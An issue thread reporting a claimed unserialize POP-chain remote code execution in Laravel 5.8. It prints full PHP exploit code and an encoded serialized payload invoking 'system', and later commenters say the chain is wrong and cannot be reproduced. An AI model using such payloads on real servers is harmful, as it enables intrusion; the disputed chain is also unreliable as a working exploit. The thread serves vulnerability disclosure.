There is an unserialize POP vulnerability that can RCE

[guoyanan1g]

There is a php unserialize POP chain . The files and the functions are : ①laravel5.8\vendor\laravel\framework\src\Illuminate\Routing\PendingResourceRegistration.php ,destruct() ②laravel5.8\vendor\laravel\framework\src\Illuminate\Queue\Capsule\Manager.php,call(), ③laravel5.8\vendor\mockery\mockery\library\Mockery\ClosureWrapper.php,__invoke(). The exp is :

<?php

namespace Illuminate\Routing{
    class PendingResourceRegistration{
        protected $registrar;
        protected $name;
        protected $controller;
        protected $options = [];
        protected $registered = false;
        public function __construct($b){
            $this->registrar=$b;
        }
    }
}

namespace Illuminate\Queue\Capsule{
    class Manager{
        protected $manager;
        public function __construct($c)
        {
            $this->manager->method=$c;
        }

    }
}

namespace Mockery{
    class ClosureWrapper{
        private $closure;
        public function __construct(){
            $this->closure="system";
        }
    }
}

namespace{

    use Illuminate\Queue\Capsule\Manager;
    use Illuminate\Routing\PendingResourceRegistration;
    use Mockery\ClosureWrapper;

    $c=new ClosureWrapper("dir");
    $b=new Manager($c);
    $a=new PendingResourceRegistration($b);

    print(urlencode(serialize($a)));
}

//O%3A46%3A%22Illuminate%5CRouting%5CPendingResourceRegistration%22%3A5%3A%7Bs%3A12%3A%22%00%2A%00registrar%22%3BO%3A32%3A%22Illuminate%5CQueue%5CCapsule%5CManager%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00manager%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22method%22%3BO%3A22%3A%22Mockery%5CClosureWrapper%22%3A1%3A%7Bs%3A31%3A%22%00Mockery%5CClosureWrapper%00closure%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A7%3A%22%00%2A%00name%22%3BN%3Bs%3A13%3A%22%00%2A%00controller%22%3BN%3Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A0%3A%7B%7Ds%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3B%7D

[ellgreen]

Hi @guoyanan1g, does this only affect Laravel 5?

[guoyanan1g]

i haven't test the lower versions，maybe u can try to find if these functions are in the lower versions😂

[ellgreen]

Sorry, I was talking about the higher versions, we're currently using Laravel 8

[guoyanan1g]

i think it can't...

[PinkieChen]

hi, @guoyanan1g ,I have some trouble when reproducing the vulnerability 1、Why is it showing this error ?

2、$c=new ClosureWrapper("dir"); why the payload doesn't have "dir" ?

[ellgreen]

Hi @PinkieChen, there is a similar CVE here: https://github.com/1nhann/vulns/issues/1

The comments hold a bit more information about replicating the issue, but seems to boil down to not unserialising unvalidated user input which is advised against by PHP already:

[guoyanan1g]

sorry,the exp is just an example showing the call callee relationship and the order ,u can view it as a reference ,pls not use it as payload directly .

[kang8]

Hi @guoyanan1g,

I think you gave the exp is wrong and cannot be reproduced in my local.

The problem is that the $this->manager->method(Especially method) in Manager of __construct() has no effect:

namespace Illuminate\Queue\Capsule{
    class Manager{
        protected $manager;
        public function __construct($c)
        {
            $this->manager->method=$c; // This line
        }
    }
}

In Laravel 5.8, Manager's __call() code is as follows:

public function __call($method, $parameters)
{
    return $this->manager->$method(...$parameters);
}

In your exp example, the value of $method is register in POP chain, and there is no register() function in ClosureWrapper, nor in the exp example you gave. When you give $this->manager->method=$c, I don't know what the intention is here.

I created a repo(https://github.com/kang8/CVE-2021-43503) to prove this. If you can create a directory(like hello/) with RCE, please send a PR to prove it.

[sudheeshms]

@guoyanan1g , @kang8 One doubt, is it necessary that the dependent package(in this case - mockery) should be available on the server in order to exploit this vulnerability?

Thanks in advance.

[kang8]

In fact, I can't even reproduce the vulnerability.